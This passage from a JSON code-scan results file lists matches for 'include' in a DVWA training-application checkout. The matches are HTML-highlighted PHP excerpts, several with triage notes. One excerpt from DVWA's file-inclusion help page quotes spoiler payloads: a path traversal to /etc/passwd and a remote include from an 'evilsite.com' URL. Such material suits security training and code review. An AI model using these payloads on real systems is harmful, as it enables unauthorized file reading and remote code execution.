  "match": "<span class=\"line-number\">5:</span> \t<span class=\"token keyword\">exit</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> }\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token function\">session_start</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">; // Creates a 'Full Path Disclosure' vuln.</span>\n<span class=\"line-number\">9:</span> \n<span class=\"highlight\"><span class=\"line-number\">10:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Include configs</span>\n<span class=\"line-number\">11:</span> require_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'config/config.inc.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> <span class=\"token function\">require_once</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'dvwaPhpIds.inc.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Declare the <span class=\"token variable\">$html</span> variable\n<span class=\"line-number\">15:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$html</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {",
  "line": 10,
  "start": 5,
  "end": 16,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 34,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
  "filetype": "php",
  "search": "\\sinclude",
  "match": "<span class=\"line-number\">6:</span> }\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token function\">define</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'DVWA_WEB_ROOT_TO_PHPIDS'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'external/phpids/'</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaPhpIdsVersionGet</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'/'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token function\">define</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'DVWA_WEB_PAGE_TO_PHPIDS'</span><span class=\"token punctuation\">,</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> DVWA_WEB_ROOT_TO_PHPIDS <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"highlight\"><span class=\"line-number\">11:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Add PHPIDS <span class=\"token keyword\">to</span> include path</span>\n<span class=\"line-number\">12:</span> <span class=\"token function\">set_include_path</span><span class=\"token punctuation\">(</span> <span class=\"token function\">get_include_path</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> PATH_SEPARATOR <span class=\"token punctuation\">.</span> DVWA_WEB_PAGE_TO_PHPIDS <span class=\"token punctuation\">.</span> <span class=\"token string\">'lib/'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" 
spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> require_once <span class=\"token string\">'IDS/Init.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> function <span class=\"token function\">dvwaPhpIdsVersionGet</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {",
  "line": 11,
  "start": 6,
  "end": 17,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 39,
  "file": "/home/chris/src/DVWA-master/hackable/flags/fi.php",
  "filetype": "php",
  "search": "\\sinclude",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">defined</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'DVWA_WEB_PAGE_TO_ROOT'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">4:</span> \t<span class=\"token keyword\">exit</span> <span class=\"token punctuation\">(</span>\"Nice try <span class=\"token comment\" spellcheck=\"true\">;-). Use the file include next time!\");</span></span>\n<span class=\"line-number\">5:</span> }\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> <span class=\"token operator\">?</span><span class=\"token operator\">></span>\n<span class=\"line-number\">8:</span> \n<span class=\"line-number\">9:</span> <span class=\"token number\">1</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">)</span> Bond<span class=\"token punctuation\">.</span> James Bond",
  "line": 4,
  "start": 1,
  "end": 10,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 40,
  "file": "/home/chris/src/DVWA-master/index.php",
  "filetype": "php",
  "search": "\\sinclude",
  "match": "<span class=\"line-number\">18:</span> \t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">19:</span> \n<span class=\"line-number\">20:</span> \t<span class=\"token operator\">&lt;</span>h2<span class=\"token operator\">></span>General Instructions<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h2<span class=\"token operator\">></span>\n<span class=\"line-number\">21:</span> \t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>It is up <span class=\"token keyword\">to</span> the user how they approach DVWA<span class=\"token punctuation\">.</span> Either by working through every module at a fixed level<span class=\"token punctuation\">,</span> <span class=\"token operator\">or</span> selecting any module <span class=\"token operator\">and</span> working up <span class=\"token keyword\">to</span> reach the highest level they can before moving onto the <span class=\"token keyword\">next</span> one<span class=\"token punctuation\">.</span> There is <span class=\"token operator\">not</span> a fixed object <span class=\"token keyword\">to</span> complete a module<span class=\"token comment\" spellcheck=\"true\">; however users should feel that they have successfully exploited the system as best as they possible could by using that particular vulnerability.&lt;/p></span>\n<span class=\"line-number\">22:</span> \t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>Please note<span class=\"token punctuation\">,</span> there are <span class=\"token operator\">&lt;</span>em<span class=\"token operator\">></span>both documented <span class=\"token operator\">and</span> undocumented vulnerability<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>em<span class=\"token operator\">></span> <span class=\"token keyword\">with</span> this 
software<span class=\"token punctuation\">.</span> This is intentional<span class=\"token punctuation\">.</span> You are encouraged <span class=\"token keyword\">to</span> try <span class=\"token operator\">and</span> discover as many issues as possible<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">23:</span> \t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>DVWA also includes a Web Application Firewall <span class=\"token punctuation\">(</span>WAF<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> PHPIDS<span class=\"token punctuation\">,</span> which can be enabled at any stage <span class=\"token keyword\">to</span> further increase the difficulty<span class=\"token punctuation\">.</span> This will demonstrate how adding another layer of security may block certain malicious actions<span class=\"token punctuation\">.</span> Note<span class=\"token punctuation\">,</span> there are also various public methods at bypassing these protections <span class=\"token punctuation\">(</span>so this can be see an as extension <span class=\"token keyword\">for</span> more advance users<span class=\"token punctuation\">)</span>!<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">24:</span> \t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>There is a help button at the bottom of each page<span class=\"token punctuation\">,</span> which allows you <span class=\"token keyword\">to</span> view hints <span class=\"token operator\">&amp;</span> tips <span class=\"token keyword\">for</span> that vulnerability<span class=\"token punctuation\">.</span> There are also additional links <span class=\"token 
keyword\">for</span> further background reading<span class=\"token punctuation\">,</span> which relates <span class=\"token keyword\">to</span> that security issue<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">25:</span> \t<span class=\"token operator\">&lt;</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">26:</span> \t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">27:</span> \n<span class=\"line-number\">28:</span> \t<span class=\"token operator\">&lt;</span>h2<span class=\"token operator\">></span>WARNING!<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h2<span class=\"token operator\">></span>",
  "line": 23,
  "start": 18,
  "end": 29,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 59,
  "file": "/home/chris/src/DVWA-master/setup.php",
  "filetype": "php",
  "search": "\\sinclude",
  "match": "<span class=\"line-number\">12:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'create_db'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"line-number\">14:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'setup.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'MySQL'</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">17:</span> \t\tinclude_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'dvwa/includes/DBMS/MySQL.php'</span><span class=\"token comment\" 
spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">18:</span> \t}\n<span class=\"line-number\">19:</span> \t<span class=\"token function\">elseif</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'PGSQL'</span><span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">20:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> include_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'dvwa/includes/DBMS/PGSQL.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'PostgreSQL is not yet fully supported.'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 17,
  "start": 12,
  "end": 23,
  "severity": "unknown",
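  "note": "Triage: the include_once path is the constant DVWA_WEB_PAGE_TO_ROOT joined to a string literal, chosen by comparing $DBMS with fixed values; no request data reaches the include in the lines shown. Confirm where DVWA_WEB_PAGE_TO_ROOT and $DBMS are set."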
 },
 {
  "id": 60,
  "file": "/home/chris/src/DVWA-master/setup.php",
  "filetype": "php",
  "search": "\\sinclude",
  "match": "<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'MySQL'</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">17:</span> \t\tinclude_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'dvwa/includes/DBMS/MySQL.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t}\n<span class=\"line-number\">19:</span> \t<span class=\"token function\">elseif</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'PGSQL'</span><span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">20:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> include_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'dvwa/includes/DBMS/PGSQL.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">21:</span> \t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'PostgreSQL is not yet fully supported.'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> \t}\n<span class=\"line-number\">24:</span> \t<span class=\"token keyword\">else</span> {\n<span 
class=\"line-number\">25:</span> \t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ERROR: Invalid database selected. Please review the config file syntax.'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 20,
  "start": 15,
  "end": 26,
  "severity": "unknown",
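  "note": "Triage: the matched include_once on line 20 is commented out, so the PGSQL branch includes nothing; the live include on line 17 uses a literal path."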
 },
 {
  "id": 61,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/help/help.php",
  "filetype": "php",
  "search": "\\sinclude",
  "match": "<span class=\"line-number\">7:</span> \t<span class=\"token operator\">&lt;</span>td<span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>div id<span class=\"token operator\">=</span><span class=\"token string\">\"code\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>About<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">9:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>Password cracking is the process of recovering passwords from data that has been stored <span class=\"token keyword\">in</span> <span class=\"token operator\">or</span> transmitted by a computer system<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">10:</span> \t\t\tA common approach is <span class=\"token keyword\">to</span> repeatedly try guesses <span class=\"token keyword\">for</span> the password<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">11:</span> \n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>Users often choose weak passwords<span class=\"token punctuation\">.</span> Examples of insecure choices include single words found <span class=\"token keyword\">in</span> dictionaries<span class=\"token punctuation\">,</span> family names<span class=\"token punctuation\">,</span> any too short password</span>\n<span class=\"line-number\">13:</span> \t\t\t<span class=\"token punctuation\">(</span>usually thought <span class=\"token keyword\">to</span> be less than <span class=\"token number\">6</span> <span class=\"token 
operator\">or</span> <span class=\"token number\">7</span> characters<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">or</span> predictable patterns\n<span class=\"line-number\">14:</span> \t\t\t<span class=\"token punctuation\">(</span>e<span class=\"token punctuation\">.</span>g<span class=\"token punctuation\">.</span> alternating vowels <span class=\"token operator\">and</span> consonants<span class=\"token punctuation\">,</span> which is known as leetspeak<span class=\"token punctuation\">,</span> so <span class=\"token string\">\"password\"</span> becomes <span class=\"token string\">\"p@55w0rd\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>Creating a targeted wordlists<span class=\"token punctuation\">,</span> which is generated towards the target<span class=\"token punctuation\">,</span> often gives the highest success rate<span class=\"token punctuation\">.</span> There are public tools out there that will create a dictionary\n<span class=\"line-number\">17:</span> \t\t\tbased on a combination of company websites<span class=\"token punctuation\">,</span> personal social networks <span class=\"token operator\">and</span> other common information <span class=\"token punctuation\">(</span>such as birthdays <span class=\"token operator\">or</span> year of graduation<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>",
  "line": 12,
  "start": 7,
  "end": 18,
  "severity": "unknown",
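  "note": "Triage: false positive. The pattern matched the word include in help-page prose on line 12, not a PHP include statement."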
 },
 {
  "id": 87,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/help/help.php",
  "filetype": "php",
  "search": "\\sinclude",
  "match": "<span class=\"line-number\">9:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>A <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php echo <span class=\"token function\">dvwaExternalLinkUrlGet</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'http://www.captcha.net/'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'CAPTCHA'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">; ?> is a program that can tell whether its user is a human or a computer. You've probably seen</span>\n<span class=\"line-number\">10:</span> \t\t\tthem <span class=\"token operator\">-</span> colourful images <span class=\"token keyword\">with</span> distorted text at the bottom of Web registration forms<span class=\"token punctuation\">.</span> CAPTCHAs are used by many websites <span class=\"token keyword\">to</span> prevent abuse from\n<span class=\"line-number\">11:</span> \t\t\t<span class=\"token string\">\"bots\"</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">or</span> automated programs usually written <span class=\"token keyword\">to</span> generate spam<span class=\"token punctuation\">.</span> No computer program can read distorted text as well as humans can<span class=\"token punctuation\">,</span> so bots\n<span class=\"line-number\">12:</span> \t\t\tcannot navigate sites protected by CAPTCHAs<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">13:</span> \n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>CAPTCHAs are often used <span class=\"token keyword\">to</span> protect sensitive functionality from automated 
bots<span class=\"token punctuation\">.</span> Such functionality typically includes user registration <span class=\"token operator\">and</span> changes<span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">15:</span> \t\t\tpassword changes<span class=\"token punctuation\">,</span> <span class=\"token operator\">and</span> posting content<span class=\"token punctuation\">.</span> <span class=\"token keyword\">In</span> this example<span class=\"token punctuation\">,</span> the CAPTCHA is guarding the change password functionality <span class=\"token keyword\">for</span> the user account<span class=\"token punctuation\">.</span> This provides\n<span class=\"line-number\">16:</span> \t\t\tlimited protection from CSRF attacks as well as automated bot guessing<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">19:</span> ",
  "line": 14,
  "start": 9,
  "end": 20,
  "severity": "unknown",
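  "note": "Triage: false positive. The pattern matched the word includes in help-page prose on line 14; the only PHP on view is an echo of dvwaExternalLinkUrlGet with literal arguments."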
 },
 {
  "id": 194,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/fi/help/help.php",
  "filetype": "php",
  "search": "\\sinclude",
  "match": "<span class=\"line-number\">8:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>About<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">9:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>Some web applications allow the user <span class=\"token keyword\">to</span> specify input that is used directly into file streams <span class=\"token operator\">or</span> allows the user <span class=\"token keyword\">to</span> upload files <span class=\"token keyword\">to</span> the server<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">10:</span> \t\t\tAt a later time the web application accesses the user supplied input <span class=\"token keyword\">in</span> the web applications context<span class=\"token punctuation\">.</span> By doing this<span class=\"token punctuation\">,</span> the web application is allowing\n<span class=\"line-number\">11:</span> \t\t\tthe potential <span class=\"token keyword\">for</span> malicious file execution<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">12:</span> \n<span class=\"highlight\"><span class=\"line-number\">13:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span><span class=\"token keyword\">If</span> the file chosen <span class=\"token keyword\">to</span> be included is <span class=\"token keyword\">local</span> on the target machine<span class=\"token punctuation\">,</span> it is called \"<span class=\"token keyword\">Local</span> File Inclusion <span class=\"token punctuation\">(</span>LFI<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span> But files may also be included on other</span>\n<span 
class=\"line-number\">14:</span> \t\t\tmachines<span class=\"token punctuation\">,</span> which <span class=\"token keyword\">then</span> the attack is a \"Remote File Inclusion <span class=\"token punctuation\">(</span>RFI<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>When RFI is <span class=\"token operator\">not</span> an option<span class=\"token punctuation\">.</span> using another vulnerability <span class=\"token keyword\">with</span> LFI <span class=\"token punctuation\">(</span>such as file upload <span class=\"token operator\">and</span> directory traversal<span class=\"token punctuation\">)</span> can often achieve the same effect<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>Note<span class=\"token punctuation\">,</span> the term <span class=\"token string\">\"file inclusion\"</span> is <span class=\"token operator\">not</span> the same as <span class=\"token string\">\"arbitrary file access\"</span> <span class=\"token operator\">or</span> <span class=\"token string\">\"file disclosure\"</span><span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>",
  "line": 13,
  "start": 8,
  "end": 19,
  "severity": "unknown",
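  "note": "Triage: false positive. The pattern matched the word included in the help text describing file inclusion on line 13; no include statement is present in the excerpt."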
 },
 {
  "id": 195,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/fi/help/help.php",
  "filetype": "php",
  "search": "\\sinclude",
  "match": "<span class=\"line-number\">23:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>Read all <span class=\"token operator\">&lt;</span>u<span class=\"token operator\">></span>five<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>u<span class=\"token operator\">></span> famous quotes from <span class=\"token string\">'&lt;a href=\"../hackable/flags/fi.php\">../hackable/flags/fi.php&lt;/a>'</span> using only the file inclusion<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">24:</span> \n<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">26:</span> \n<span class=\"line-number\">27:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Low Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">28:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>This allows <span class=\"token keyword\">for</span> direct input into <span class=\"token operator\">&lt;</span>u<span class=\"token operator\">></span>one of many PHP functions<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>u<span class=\"token operator\">></span> that will include the content when executing<span class=\"token punctuation\">.</span><span class=\"token 
operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">29:</span> \n<span class=\"line-number\">30:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>Depending on the web service configuration will depend <span class=\"token keyword\">if</span> RFI is a possibility<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">31:</span> \t\t<span class=\"token operator\">&lt;</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>LFI<span class=\"token punctuation\">:</span> <span class=\"token operator\">?</span>page<span class=\"token operator\">=</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token operator\">/</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token operator\">/</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token operator\">/</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token operator\">/</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token operator\">/</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token operator\">/</span>etc<span class=\"token operator\">/</span>passwd<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span>\n<span 
class=\"line-number\">32:</span> \t\t\tSpoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>RFI<span class=\"token punctuation\">:</span> <span class=\"token operator\">?</span>page<span class=\"token operator\">=</span>http<span class=\"token punctuation\">:</span><span class=\"token operator\">/</span><span class=\"token operator\">/</span>www<span class=\"token punctuation\">.</span>evilsite<span class=\"token punctuation\">.</span>com<span class=\"token operator\">/</span>evil<span class=\"token punctuation\">.</span>php<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">33:</span> ",
  "line": 28,
  "start": 23,
  "end": 34,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 196,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/fi/help/help.php",
  "filetype": "php",
  "search": "\\sinclude",
  "match": "<span class=\"line-number\">40:</span> \n<span class=\"line-number\">41:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">42:</span> \n<span class=\"line-number\">43:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>High Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">44:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>The developer has had enough<span class=\"token punctuation\">.</span> They decided <span class=\"token keyword\">to</span> only allow certain files <span class=\"token keyword\">to</span> be used<span class=\"token punctuation\">.</span> However as there are multiple files <span class=\"token keyword\">with</span> the same basename<span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">45:</span> \t\t\tthey use a wildcard <span class=\"token keyword\">to</span> include them all<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">46:</span> \t\t<span class=\"token operator\">&lt;</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>LFI<span class=\"token punctuation\">:</span> The filename only has start <span class=\"token keyword\">with</span> a certain value<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>span<span class=\"token 
